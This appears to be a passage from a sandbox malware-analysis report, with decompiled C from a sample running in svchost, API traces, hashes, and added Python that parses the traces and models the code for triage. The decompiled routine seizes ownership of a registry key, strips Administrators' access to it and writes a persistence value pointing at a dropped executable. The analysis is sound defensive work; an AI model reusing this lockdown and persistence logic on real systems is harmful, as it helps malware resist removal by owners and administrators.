                                                                                                                                  				intOrPtr _t32;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t41;
                                                                                                                                  				struct HINSTANCE__* _t48;
                                                                                                                                  				_Unknown_base(*)()* _t49;
                                                                                                                                  				void* _t50;
                                                                                                                                  
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				__imp__#11("123.45.67.89");
                                                                                                                                  				_v24 = __eax;
                                                                                                                                  				_t27 = LoadLibraryA("Iphlpapi.dll"); // executed
                                                                                                                                  				_t48 = _t27;
                                                                                                                                  				_v16 = _t48;
                                                                                                                                  				if(_t48 != 0) {
                                                                                                                                  					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
                                                                                                                                  					_t49 = GetProcAddress(_t48, "GetIfEntry");
                                                                                                                                  					_t30 = GetProcAddress(_v16, "GetBestInterface");
                                                                                                                                  					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
                                                                                                                                  						FreeLibrary(_v16);
                                                                                                                                  						goto L21;
                                                                                                                                  					} else {
                                                                                                                                  						 *_t30(_v24,  &_v20); // executed
                                                                                                                                  						_t34 = GetProcessHeap();
                                                                                                                                  						_v24 = _t34;
                                                                                                                                  						if(_t34 == 0) {
                                                                                                                                  							L21:
                                                                                                                                  							_t32 = 0;
                                                                                                                                  							L22:
                                                                                                                                  							return _t32;
                                                                                                                                  						}
                                                                                                                                  						_t50 = HeapAlloc(_t34, 0, 0x288);
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							goto L21;
                                                                                                                                  						}
                                                                                                                                  						_push( &_v8);
                                                                                                                                  						_push(_t50);
                                                                                                                                  						_v8 = 0x288;
                                                                                                                                  						if(_v12() == 0x6f) {
                                                                                                                                  							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
                                                                                                                                  						}
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							L18:
                                                                                                                                  							FreeLibrary(_v16);
                                                                                                                                  							if(_v28 == 0) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							_t32 = 1;
                                                                                                                                  							goto L22;
                                                                                                                                  						} else {
                                                                                                                                  							_push( &_v8);
                                                                                                                                  							_push(_t50); // executed
                                                                                                                                  							if(_v12() != 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							_t41 = _t50;
                                                                                                                                  							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                                                                                                                                  								_t41 =  *_t41;
                                                                                                                                  								if(_t41 != 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								L17:
                                                                                                                                  								HeapFree(_v24, 0, _t50);
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                                                                                                                                  								_v28 = 1;
                                                                                                                                  							}
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(123.45.67.89), ref: 025119B1
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,02511E9E), ref: 025119BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 025119E2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 025119ED
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 025119F9
                                                                                                                                  • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,02511E9E), ref: 02511A1B
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000001,02511E9E), ref: 02511A1D
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,02511E9E), ref: 02511A36
                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A4A
                                                                                                                                  • HeapReAlloc.KERNEL32(?,00000000,00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A5A
                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A6E
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,02511E9E), ref: 02511A9B
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,02511E9E), ref: 02511AA4
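The API trace above is the classic "which interface reaches the Internet" idiom: the literal 123.45.67.89 is converted with inet_addr and handed to GetBestInterface, which only consults the local routing table, so no packet is sent to that address and it should not be carried forward as a contact indicator. Iphlpapi.dll is loaded and its exports resolved at run time rather than imported, and GetAdaptersInfo is called, the buffer grown with HeapReAlloc, and GetAdaptersInfo called again, which is the retry loop for the ERROR_BUFFER_OVERFLOW return. The Python below is an added editor's example, not code from the Joe Sandbox report or from the sample: it parses the report's own trace line format into records and extracts those three facts. The pairing of each GetProcAddress with the most recent LoadLibrary* call, and of inet_addr with the following GetBestInterface, is positional, an assumption the parser makes because the report renders the handles as ? or 00000000.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the trace lines of this function exactly as the
# report renders them (bullet, API.MODULE(args), ref: hex address).
SAMPLE_TRACE = """\
• inet_addr.WS2_32(123.45.67.89), ref: 025119B1
• LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,02511E9E), ref: 025119BF
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 025119E2
• GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 025119ED
• GetProcAddress.KERNEL32(?,GetBestInterface), ref: 025119F9
• GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,02511E9E), ref: 02511A1B
• GetProcessHeap.KERNEL32(?,?,?,?,00000001,02511E9E), ref: 02511A1D
• HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,02511E9E), ref: 02511A36
• GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A4A
• HeapReAlloc.KERNEL32(?,00000000,00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A5A
• GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A6E
• HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,02511E9E), ref: 02511A9B
• FreeLibrary.KERNEL32(?,?,?,?,?,00000001,02511E9E), ref: 02511AA4
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_trace(text):
    """Turn the report's bullet lines into ApiCall records; unknown lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def dynamic_imports(calls):
    """Map each export resolved via GetProcAddress to the DLL named in the most
    recent LoadLibrary* call (positional pairing: the handle column is ?/00000000)."""
    current_dll, resolved = None, {}
    for c in calls:
        if c.api.startswith("LoadLibrary") and c.args:
            current_dll = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            resolved[c.args[1]] = current_dll
    return resolved


def route_probe_address(calls):
    """Return the inet_addr literal that is followed by GetBestInterface: a
    routing-table probe address, not a destination the process talks to."""
    literal = None
    for c in calls:
        if c.api == "inet_addr" and c.args:
            literal = c.args[0]
        elif c.api == "GetBestInterface" and literal is not None:
            return literal
    return None


def has_grow_and_retry(calls, api="GetAdaptersInfo"):
    """True when `api` is called, the buffer is reallocated, and `api` is called
    again: the ERROR_BUFFER_OVERFLOW retry idiom for variable-size results."""
    seq = [c.api for c in calls]
    for i, name in enumerate(seq):
        if name == api:
            rest = seq[i + 1:]
            if "HeapReAlloc" in rest and api in rest[rest.index("HeapReAlloc"):]:
                return True
    return False


def summarize(calls):
    """Collect the analyst-relevant facts from one function's trace."""
    first_alloc = next((c for c in calls if c.api == "HeapAlloc"), None)
    return {
        "dynamic_imports": dynamic_imports(calls),
        "route_probe": route_probe_address(calls),
        "initial_buffer": int(first_alloc.args[2], 16) if first_alloc else None,
        "grow_and_retry": has_grow_and_retry(calls),
    }


if __name__ == "__main__":
    print(summarize(parse_trace(SAMPLE_TRACE)))
```

The same parser works on the other "APIs" blocks of the report; the summary is what would go into a triage note (run-time-resolved Iphlpapi exports, a probe address to exclude from network IOCs, a 0x288-byte initial buffer that is regrown once).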
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                                                                  • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                                                                  • API String ID: 293628436-270533642
                                                                                                                                  • Opcode ID: c080a8b8f8c440dd1e9cd7a611a03d5a496fe22a732974bc5e28bd5007aea998
                                                                                                                                  • Instruction ID: f17c8dab92996cfa280616ee8817a1a0bd1f464d32dd4121bcb66c460e7420ad
                                                                                                                                  • Opcode Fuzzy Hash: c080a8b8f8c440dd1e9cd7a611a03d5a496fe22a732974bc5e28bd5007aea998
                                                                                                                                  • Instruction Fuzzy Hash: 0C319232D01619AFEF119FE0CD888BEBFB9FF55211F1545BAE605A21C0D7308A44DBA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 696 2517a95-2517ac2 RegOpenKeyExA 697 2517ac4-2517ac6 696->697 698 2517acb-2517ae7 GetUserNameA 696->698 699 2517db4-2517db6 697->699 700 2517da7-2517db3 RegCloseKey 698->700 701 2517aed-2517b1e LookupAccountNameA 698->701 700->699 701->700 702 2517b24-2517b43 RegGetKeySecurity 701->702 702->700 703 2517b49-2517b61 GetSecurityDescriptorOwner 702->703 704 2517b63-2517b72 EqualSid 703->704 705 2517bb8-2517bd6 GetSecurityDescriptorDacl 703->705 704->705 706 2517b74-2517b88 LocalAlloc 704->706 707 2517da6 705->707 708 2517bdc-2517be1 705->708 706->705 709 2517b8a-2517b94 InitializeSecurityDescriptor 706->709 707->700 708->707 710 2517be7-2517bf2 708->710 711 2517bb1-2517bb2 LocalFree 709->711 712 2517b96-2517ba4 SetSecurityDescriptorOwner 709->712 710->707 713 2517bf8-2517c08 GetAce 710->713 711->705 712->711 716 2517ba6-2517bab RegSetKeySecurity 712->716 714 2517cc6 713->714 715 2517c0e-2517c1b 713->715 717 2517cc9-2517cd3 714->717 718 2517c1d-2517c2f EqualSid 715->718 719 2517c4f-2517c52 715->719 720 2517cd9-2517cdc 717->720 721 2517c31-2517c34 718->721 722 2517c36-2517c38 718->722 723 2517c54-2517c5e 719->723 724 2517c5f-2517c71 EqualSid 719->724 720->707 725 2517ce2-2517ce8 720->725 721->718 721->722 722->719 726 2517c3a-2517c4d DeleteAce 722->726 727 2517c73-2517c84 724->727 728 2517c86 724->728 729 2517d5a-2517d6e LocalAlloc 725->729 730 2517cea-2517cf0 725->730 726->717 731 2517c8b-2517c8e 727->731 728->731 729->707 735 2517d70-2517d7a InitializeSecurityDescriptor 729->735 730->729 732 2517cf2-2517d0d RegOpenKeyExA 730->732 733 2517c90-2517c96 731->733 734 2517c9d-2517c9f 731->734 732->729 736 2517d0f-2517d16 732->736 733->734 737 2517ca1-2517ca5 734->737 738 2517ca7-2517cc3 734->738 739 2517d7c-2517d8a SetSecurityDescriptorDacl 735->739 740 2517d9f-2517da0 LocalFree 735->740 741 2517d19-2517d1e 736->741 737->714 737->738 738->714 739->740 742 2517d8c-2517d9a RegSetKeySecurity 739->742 740->707 741->741 743 2517d20-2517d52 call 2512544 RegSetValueExA 741->743 742->740 744 2517d9c 742->744 743->729 747 2517d54 743->747 744->740 747->729
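The graph above and the listing that follows describe a registry key lockdown: E02517A95 opens the key with 0xE0100 (READ_CONTROL, WRITE_DAC, WRITE_OWNER and KEY_WOW64_64KEY), reads owner and DACL (security information 5), replaces the owner with the current user's SID when they differ, and then walks the DACL. For each ACE it sets the mask to 0xF003F (KEY_ALL_ACCESS) or 0xE0039 for the caller's own SID and to 0x20000 (READ_CONTROL) for every other SID, converts any ACE that is not ACCESS_ALLOWED or that carries INHERITED_ACE into an explicit allow ACE with CONTAINER_INHERIT_ACE, and writes the DACL back through RegSetKeySecurity when anything changed. The Python below is an added editor's model of that logic, not code from the report or the sample: it names the bits behind the hex constants and replays the ACE rewrite on a constructed DACL. Assumptions labelled in the code: SIDs are modelled as their sub-authority tuple; the EqualSid/DeleteAce blocks at 2517c1d and 2517c3a are read as deletion of a second ACE for a SID already seen (that branch of the listing is outside this excerpt) and counted as a change; and which value of the third argument selects KEY_ALL_ACCESS versus 0xE0039 is not unambiguous from the decompilation, so it is a parameter here.

```python
from dataclasses import dataclass, replace

# Registry access rights and ACE constants as defined in the Windows SDK
# (winnt.h); the hex literals in the listing resolve to combinations of these.
RIGHTS = {
    0x00000001: "KEY_QUERY_VALUE",     0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",  0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",          0x00000020: "KEY_CREATE_LINK",
    0x00000100: "KEY_WOW64_64KEY",     0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",        0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
READ_CONTROL = 0x00020000
KEY_ALL_ACCESS = 0x000F003F
ACCESS_ALLOWED_ACE_TYPE = 0
ACCESS_DENIED_ACE_TYPE = 1
CONTAINER_INHERIT_ACE = 0x02
INHERIT_ONLY_ACE = 0x08
INHERITED_ACE = 0x10

OPEN_MASK = 0x000E0100              # RegOpenKeyExA samDesired in the listing
SELF_MASK_LIMITED = 0x000E0039      # owner mask variant without 0x10006
SELF_MASK_FULL = KEY_ALL_ACCESS     # 0xE0039 + 0x10006
OTHERS_MASK = READ_CONTROL          # 0x20000 for every SID that is not the caller


def decode_mask(mask):
    """Name the rights set in an access mask, lowest bit first."""
    return [name for bit, name in sorted(RIGHTS.items()) if mask & bit]


@dataclass(frozen=True)
class Ace:
    sid: tuple        # assumption: SID modelled by its sub-authorities; S-1-1-0 is (0,)
    ace_type: int
    ace_flags: int
    mask: int


def rewrite_dacl(dacl, self_sid, full_access):
    """Model of the ACE loop: returns (new_dacl, changed)."""
    self_mask = SELF_MASK_FULL if full_access else SELF_MASK_LIMITED   # polarity: assumption
    seen, out, changed = [], [], False
    for ace in dacl:
        # Inferred from the EqualSid/DeleteAce blocks: a SID seen earlier in the
        # DACL loses its later ACE; the listing keeps at most 0x20 seen SIDs.
        if ace.sid in seen:
            changed = True
            continue
        if len(seen) < 0x20:
            seen.append(ace.sid)
        wanted = self_mask if ace.sid == self_sid else OTHERS_MASK
        if ace.mask != wanted:
            ace, changed = replace(ace, mask=wanted), True
        # Deny or inherited ACEs become explicit allow ACEs; INHERIT_ONLY_ACE is
        # added when the SID's first sub-authority is 0 (the *(SID+8) test).
        if ace.ace_type != ACCESS_ALLOWED_ACE_TYPE or ace.ace_flags & INHERITED_ACE:
            flags = CONTAINER_INHERIT_ACE | (INHERIT_ONLY_ACE if ace.sid[0] == 0 else 0)
            ace, changed = replace(ace, ace_type=ACCESS_ALLOWED_ACE_TYPE, ace_flags=flags), True
        out.append(ace)
    return out, changed


def lockdown_key(owner_sid, dacl, self_sid, full_access):
    """Whole-function model: take ownership when the owner is not the caller
    (the EqualSid / SetSecurityDescriptorOwner path), then rewrite the DACL.
    Returns what would be written back and whether each RegSetKeySecurity runs."""
    set_owner = owner_sid != self_sid
    new_dacl, set_dacl = rewrite_dacl(dacl, self_sid, full_access)
    return {"owner": self_sid if set_owner else owner_sid, "set_owner": set_owner,
            "dacl": new_dacl, "set_dacl": set_dacl}


# Constructed sample: a key owned by Administrators with a typical inherited DACL.
SELF = (21, 1111, 2222, 1001)     # S-1-5-21-1111-2222-1001 (constructed user)
ADMINS = (32, 544)                # BUILTIN\Administrators
EVERYONE = (0,)                   # S-1-1-0
SAMPLE_DACL = [
    Ace(ADMINS, ACCESS_ALLOWED_ACE_TYPE, INHERITED_ACE, KEY_ALL_ACCESS),
    Ace(SELF, ACCESS_ALLOWED_ACE_TYPE, 0, 0x00020019),         # KEY_READ
    Ace(ADMINS, ACCESS_ALLOWED_ACE_TYPE, 0, KEY_ALL_ACCESS),   # second ACE, same SID
    Ace(EVERYONE, ACCESS_DENIED_ACE_TYPE, 0, 0x00020019),
]

if __name__ == "__main__":
    result = lockdown_key(ADMINS, SAMPLE_DACL, SELF, full_access=True)
    for ace in result["dacl"]:
        print(ace.sid, ace.ace_type, hex(ace.ace_flags), decode_mask(ace.mask))
```

Two things the decoded constants make visible: the 0x10006 that separates the two owner masks is exactly DELETE, KEY_SET_VALUE and KEY_CREATE_SUB_KEY, so the limited variant leaves even the owning account unable to modify or delete the key; and every other principal, Administrators included, is cut down to READ_CONTROL. A key whose DACL grants Administrators and SYSTEM nothing but READ_CONTROL while a plain user SID holds KEY_ALL_ACCESS is therefore a usable hunt condition for this behaviour.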
                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E02517A95(void* _a4, char* _a8, signed int _a12) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				int _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				struct _ACL* _v32;
                                                                                                                                  				long _v36;
                                                                                                                                  				long _v40;
                                                                                                                                  				long _v44;
                                                                                                                                  				int _v48;
                                                                                                                                  				int _v52;
                                                                                                                                  				union _SID_NAME_USE _v56;
                                                                                                                                  				int _v60;
                                                                                                                                  				int _v64;
                                                                                                                                  				void _v132;
                                                                                                                                  				char _v388;
                                                                                                                                  				char _v516;
                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v1540;
                                                                                                                                  				long _t92;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t104;
                                                                                                                                  				void* _t107;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t116;
                                                                                                                                  				struct _ACL* _t117;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t120;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				void* _t125;
                                                                                                                                  				char* _t126;
                                                                                                                                  				void* _t130;
                                                                                                                                  				void* _t134;
                                                                                                                                  				void* _t135;
                                                                                                                                  				signed int _t136;
                                                                                                                                  				void* _t143;
                                                                                                                                  				void* _t146;
                                                                                                                                  				int _t148;
                                                                                                                                  				int _t151;
                                                                                                                                  				char* _t158;
                                                                                                                                  				void** _t159;
                                                                                                                                  				void* _t161;
                                                                                                                                  				void* _t164;
                                                                                                                                  				signed int _t172;
                                                                                                                                  				void* _t173;
                                                                                                                                  				char* _t174;
                                                                                                                                  				void* _t175;
                                                                                                                                  				void* _t176;
                                                                                                                                  
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_t92 = RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28); // executed
                                                                                                                                  				if(_t92 != 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_v40 = 0x80;
                                                                                                                                  				_t95 = GetUserNameA( &_v388,  &_v40);
                                                                                                                                  				__eflags = _t95;
                                                                                                                                  				if(_t95 == 0) {
                                                                                                                                  					L48:
                                                                                                                                  					RegCloseKey(_v28); // executed
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					_v36 = 0x44;
                                                                                                                                  					_v44 = 0x80;
                                                                                                                                  					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
                                                                                                                                  					__eflags = _t104;
                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                  						goto L48;
                                                                                                                                  					}
                                                                                                                                  					_v48 = 0x400;
                                                                                                                                  					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
                                                                                                                                  					__eflags = _t107;
                                                                                                                                  					if(_t107 != 0) {
                                                                                                                                  						goto L48;
                                                                                                                                  					}
                                                                                                                                  					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
                                                                                                                                  					__eflags = _t111;
                                                                                                                                  					if(_t111 == 0) {
                                                                                                                                  						L12:
                                                                                                                                  						_v24 = 0;
                                                                                                                                  						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
                                                                                                                                  						__eflags = _t116;
                                                                                                                                  						if(_t116 == 0) {
                                                                                                                                  							L47:
                                                                                                                                  							goto L48;
                                                                                                                                  						}
                                                                                                                                  						_t117 = _v32;
                                                                                                                                  						__eflags = _t117;
                                                                                                                                  						if(_t117 == 0) {
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						_t164 = 0;
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						__eflags = 0 - _t117->AceCount;
                                                                                                                                  						if(0 >= _t117->AceCount) {
                                                                                                                                  							goto L47;
                                                                                                                                  						} else {
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L15:
                                                                                                                                  							_t118 = GetAce(_t117, _v8,  &_v20);
                                                                                                                                  							__eflags = _t118;
                                                                                                                                  							if(_t118 == 0) {
                                                                                                                                  								L31:
                                                                                                                                  								_t73 =  &_v8;
                                                                                                                                  								 *_t73 = _v8 + 1;
                                                                                                                                  								__eflags =  *_t73;
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							_t172 = 0;
                                                                                                                                  							_v16 = _v20 + 8;
                                                                                                                                  							__eflags = _t164;
                                                                                                                                  							if(_t164 <= 0) {
                                                                                                                                  								L21:
                                                                                                                                  								__eflags = _t164 - 0x20;
                                                                                                                                  								if(_t164 < 0x20) {
                                                                                                                                  									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
                                                                                                                                  									_t164 = _t164 + 1;
                                                                                                                                  									__eflags = _t164;
                                                                                                                                  								}
                                                                                                                                  								_t134 = EqualSid( &_v132, _v16);
                                                                                                                                  								_t159 = _v20;
                                                                                                                                  								__eflags = _t134;
                                                                                                                                  								if(_t134 == 0) {
                                                                                                                                  									_t135 = 0x20000;
                                                                                                                                  								} else {
                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                  									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t159[1] - _t135;
                                                                                                                                  								if(_t159[1] != _t135) {
                                                                                                                                  									_t159[1] = _t135;
                                                                                                                                  									_t159 = _v20;
                                                                                                                                  									_v24 = 1;
                                                                                                                                  								}
                                                                                                                                  								__eflags =  *_t159;
                                                                                                                                  								if( *_t159 != 0) {
                                                                                                                                  									L30:
                                                                                                                                  									 *_t159 = 0;
                                                                                                                                  									_t136 = _v16;
                                                                                                                                  									__eflags =  *(_t136 + 8);
                                                                                                                                  									_t68 =  *(_t136 + 8) == 0;
                                                                                                                                  									__eflags = _t68;
                                                                                                                                  									_v24 = 1;
                                                                                                                                  									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
                                                                                                                                  									goto L31;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t159[0] & 0x00000010;
                                                                                                                                  									if((_t159[0] & 0x00000010) == 0) {
                                                                                                                                  										goto L31;
                                                                                                                                  									}
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								goto L17;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L17:
                                                                                                                                  								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
                                                                                                                                  								__eflags = _t143;
                                                                                                                                  								if(_t143 != 0) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t172 = _t172 + 1;
                                                                                                                                  								__eflags = _t172 - _t164;
                                                                                                                                  								if(_t172 < _t164) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t172 - _t164;
                                                                                                                                  							if(_t172 >= _t164) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							DeleteAce(_v32, _v8);
                                                                                                                                  							_v24 = 1;
                                                                                                                                  							L32:
                                                                                                                                  							_t117 = _v32;
                                                                                                                                  							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
                                                                                                                                  						} while (_v8 < (_t117->AceCount & 0x0000ffff));
                                                                                                                                  						__eflags = _v24;
                                                                                                                                  						if(_v24 == 0) {
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L41:
                                                                                                                                  							_v12 = 1;
                                                                                                                                  							_t173 = LocalAlloc(0x40, 0x14);
                                                                                                                                  							__eflags = _t173;
                                                                                                                                  							if(_t173 != 0) {
                                                                                                                                  								_t120 = InitializeSecurityDescriptor(_t173, 1);
                                                                                                                                  								__eflags = _t120;
                                                                                                                                  								if(_t120 != 0) {
                                                                                                                                  									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
                                                                                                                                  									__eflags = _t122;
                                                                                                                                  									if(_t122 != 0) {
                                                                                                                                  										_t123 = RegSetKeySecurity(_v28, 4, _t173); // executed
                                                                                                                                  										__eflags = _t123;
                                                                                                                                  										if(_t123 == 0) {
                                                                                                                                  											_v12 = 1;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								LocalFree(_t173);
                                                                                                                                  							}
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *0x2522cc0; // 0x0
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						}
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12); // executed
                                                                                                                                  						__eflags = _t125;
                                                                                                                                  						if(_t125 != 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						}
                                                                                                                                  						_t158 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe";
                                                                                                                                  						_t126 = _t158;
                                                                                                                                  						_t174 =  &(_t126[1]);
                                                                                                                                  						do {
                                                                                                                                  							_t161 =  *_t126;
                                                                                                                                  							_t126 =  &(_t126[1]);
                                                                                                                                  							__eflags = _t161;
                                                                                                                                  						} while (_t161 != 0);
                                                                                                                                  						_t130 = RegSetValueExA(_v12, E02512544(0x25222f8, 0x25206dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1); // executed
                                                                                                                                  						__eflags = _t130;
                                                                                                                                  						if(_t130 == 0) {
                                                                                                                                  							 *0x2522cc0 = 0;
                                                                                                                                  						}
                                                                                                                                  						goto L41;
                                                                                                                                  					}
                                                                                                                                  					_t146 = EqualSid( &_v132, _v16);
                                                                                                                                  					__eflags = _t146;
                                                                                                                                  					if(_t146 != 0) {
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					_v12 = 1;
                                                                                                                                  					_t175 = LocalAlloc(0x40, 0x14);
                                                                                                                                  					__eflags = _t175;
                                                                                                                                  					if(_t175 != 0) {
                                                                                                                                  						_t148 = InitializeSecurityDescriptor(_t175, 1);
                                                                                                                                  						__eflags = _t148;
                                                                                                                                  						if(_t148 != 0) {
                                                                                                                                  							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
                                                                                                                                  							__eflags = _t151;
                                                                                                                                  							if(_t151 != 0) {
                                                                                                                                  								RegSetKeySecurity(_v28, 1, _t175); // executed
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						LocalFree(_t175);
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x02517aae
                                                                                                                                  0x02517ab4
                                                                                                                                  0x02517ab7
                                                                                                                                  0x02517aba
                                                                                                                                  0x02517ac2
                                                                                                                                  0x00000000
                                                                                                                                  0x02517ac4
                                                                                                                                  0x02517adc
                                                                                                                                  0x02517adf
                                                                                                                                  0x02517ae5
                                                                                                                                  0x02517ae7
                                                                                                                                  0x02517da7
                                                                                                                                  0x02517daa
                                                                                                                                  0x00000000
                                                                                                                                  0x02517aed
                                                                                                                                  0x02517b0c
                                                                                                                                  0x02517b13
                                                                                                                                  0x02517b16
                                                                                                                                  0x02517b1c
                                                                                                                                  0x02517b1e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b34
                                                                                                                                  0x02517b3b
                                                                                                                                  0x02517b41
                                                                                                                                  0x02517b43
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b59
                                                                                                                                  0x02517b5f
